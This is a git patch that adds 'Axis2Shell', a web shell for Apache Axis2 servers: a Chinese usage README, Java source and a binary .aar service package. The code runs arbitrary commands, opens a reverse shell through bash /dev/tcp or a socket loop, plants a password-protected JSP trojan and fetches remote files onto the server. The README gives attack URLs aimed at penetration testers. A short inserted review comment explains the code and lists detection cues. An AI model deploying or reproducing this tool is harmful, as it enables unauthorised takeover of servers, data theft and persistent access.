From 2a76726c7527bfad03ab9ceb761f269c47c54c28 Mon Sep 17 00:00:00 2001
From: tennc
Date: Mon, 17 Nov 2014 09:36:07 +0800
Subject: [PATCH] add axis2web shell @Svti
---
 other/Axis2Shell/README.md | 54 +++++++++++++++
 other/Axis2Shell/Utils.java | 132 ++++++++++++++++++++++++++++++++++++
 other/Axis2Shell/config.aar | Bin 0 -> 6216 bytes
 3 files changed, 186 insertions(+)
 create mode 100644 other/Axis2Shell/README.md
 create mode 100644 other/Axis2Shell/Utils.java
 create mode 100644 other/Axis2Shell/config.aar
diff --git a/other/Axis2Shell/README.md b/other/Axis2Shell/README.md
new file mode 100644
index 0000000..bdd9333
--- /dev/null
+++ b/other/Axis2Shell/README.md
@@ -0,0 +1,54 @@
+axis2
+=========
+
+axis2 web shell
+author : Svti
+url : https://github.com/Svti/Axis2Shell
+
+使用介绍:
+
+1、命令执行
+http://1.1.1.1/services/config/exec?cmd=whoami
+(不说了,执行命令。注意:xml换行没有处理好)
+
+2、反弹shell
+http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555
+(Linux则使用bash反弹shell,Windows则会进行socket执行shell)
+
+
+3、文件上传
+http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/shell.jsp
+(会把resource目录下面的one.txt 写成shell.jsp,注意:全路径,带*文件名)
+
+
+4、文件下载
+http://1.1.1.1/services/config/download?url=http://www.ooo.com/mm.txt&path=/opt/tomcat/webapps/ROOT/shell.jsp
+(会把这个URL的文件写成shell.jsp,注意:全路径,带*文件名)
+
+
+5、class目录查看
+http://1.1.1.1/services/config/getClassPath
+(会显示当前class的路径,方便文件上传)
+
+ps:
+趁周末休息,看了几个国外的机器有 axis的 项目,特地去找了@园长的Cat.aar工具,发现真心不好使。
+
+1、反弹shell 鸡肋,好多错误 ,ls / 都不行。
+
+2、没有文件上传功能。这个对于一个渗透着来说很重要
+
+于是自己写了个,希望大家喜欢。
+
+源码已经上github https://github.com/Svti/Axis2Shell
+
+
+aar 文件https://github.com/Svti/Axis2Shell/blob/master/config.aar也在github上面,还有什么问题,可以在下面评论
+
+
+注意:
+
+1、相同文件名的aar文件只能上传一次,虽说是remove Service了,服务器上面的还在。想要继续使用,请rename
+
+2、默认的jsp一句话木马是/resource/one.txt,可以自己修改。默认密码是wooyun,发布版本里面放的是one.jsp,一向鄙视伸手党
+3、Linux反弹shell 会在当前目录生成一个wooyun.sh的文件,当shell断开后会自动删除
+
diff --git a/other/Axis2Shell/Utils.java b/other/Axis2Shell/Utils.java
new file mode 100644
index 0000000..f86cd26
--- /dev/null
+++ b/other/Axis2Shell/Utils.java
@@ -0,0 +1,132 @@
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.FileWriter;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.net.Socket;
+import java.net.URL;
+import java.net.URLConnection;
+
+public class Utils {
+
+ static String os = System.getProperty("os.name").toLowerCase();
+
+ public static String exec(String cmd) {
+ String result="";
+ try {
+ if (cmd!=null&&cmd.trim().length()>0) {
+ if (os.startsWith("windows")) {
+ cmd="cmd.exe /c "+ cmd;
+ }else {
+ cmd="/bin/sh -c "+ cmd;
+ }
+ InputStream inputStream= Runtime.getRuntime().exec(cmd).getInputStream();
+
+ int read=0;
+ while ((read=inputStream.read())!=-1) {
+ result+=(char)read;
+ }
+ }
+ } catch (Exception e) {
+ result=e.getMessage();
+ }
+ return result;
+ }
+
+ public static String shell(String host, int port) {
+
+ String result = "";
+ if (host != null && host.trim().length() > 0 && port > 0) {
+ try {
+ if (os.startsWith("linux")) {
+
+ String name="wooyun.sh";
+ File file=new File(name);
+
+ FileWriter writer=new FileWriter(file);
+ writer.write("/bin/bash -i > /dev/tcp/"+host+"/"+port+" 0<&1 2>&1"+"\n");
+ writer.flush();
+ writer.close();
+ Runtime.getRuntime().exec("chmod u+x "+name);
+ Process process = Runtime.getRuntime().exec("bash "+name);
+ process.waitFor();
+
+ file.delete();
+ } else {
+ Socket socket = new Socket(host, port);
+ OutputStream out = socket.getOutputStream();
+ InputStream in = socket.getInputStream();
+ out.write(("whoami:\t" + exec("whoami")).getBytes());
+ int a = 0;
+ byte[] b = new byte[4096];
+ while ((a = in.read(b)) != -1) {
+ out.write(exec(new String(b, 0, a, "UTF-8").trim()).getBytes("UTF-8"));
+ }
+ }
+ } catch (Exception e) {
+ result = e.getMessage();
+ }
+
+ } else {
+ result = "host and port are required";
+ }
+
+ return result;
+ }
+
+ public static String upload(String path) {
+ String result="";
+ try {
+ if (path!=null&&path.trim().length()>0) {
+ FileOutputStream fos=new FileOutputStream(new File(path));
+ InputStream inputStream =new Utils().getClass().getResourceAsStream("/resource/one.txt");
+ BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
+ String temp = "";
+ while (reader.ready()) {
+ temp += reader.readLine() + "\n";
+ }
+ fos.write(temp.getBytes());
+ fos.flush();
+ fos.close();
+ result="Upload Success";
+ }else {
+ result="Path is required";
+ }
+ } catch (Exception e) {
+ result =e.getMessage();
+ }
+ return result;
+ }
+
+ public static String download(String url, String path) {
+ String result="";
+ try {
+
+ if (url!=null&&url.trim().length()>0&&path!=null&&path.trim().length()>0) {
+ URLConnection conn=new URL(url).openConnection();
+ conn.setReadTimeout(10*60*1000);
+ conn.setReadTimeout(10*60*1000);
+ InputStream inputStream=conn.getInputStream();
+ int read=0;
+ FileOutputStream fos=new FileOutputStream(new File(path));
+ while ((read=inputStream.read())!=-1) {
+ fos.write(read);
+ }
+ fos.flush();
+ fos.close();
+ }else {
+ result="Url and path are required";
+ }
+ } catch (Exception e) {
+ result =e.getMessage();
+ }
+ return result;
+ }
+
+ public static String getClassPath() {
+ return new Utils().getClass().getClassLoader().getResource("/").getPath();
+ }
+
+}
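Review bot: `Utils` has no class comment, and nothing in the file records that each public method acts directly on caller-supplied values with no authentication or allow-list in front of it: `exec` passes `cmd` to `Runtime.getRuntime().exec`, `shell` connects out to `host`/`port`, and `upload` and `download` write to whatever `path` names. A header comment should say so and list the traces the code leaves for whoever triages a host, for example `// Web shell service class: unauthenticated command execution and arbitrary file write; shell() creates wooyun.sh in the working directory and deletes it when the bash process exits`. Every `catch (Exception e)` reduces the failure to `e.getMessage()` returned to the caller and the class writes no log of its own, so detection has to come from outside it: `cmd.exe`, `/bin/sh` or `bash` spawned by the JVM that hosts the service, new files at the `path` targets, and requests to the `/services/config/` operations listed in the README.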
diff --git a/other/Axis2Shell/config.aar b/other/Axis2Shell/config.aar new file mode 100644 index 0000000000000000000000000000000000000000..4a07683b30038587907da991ed5e14b5c719004e GIT binary patch literal 6216 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 literal 0 HcmV?d00001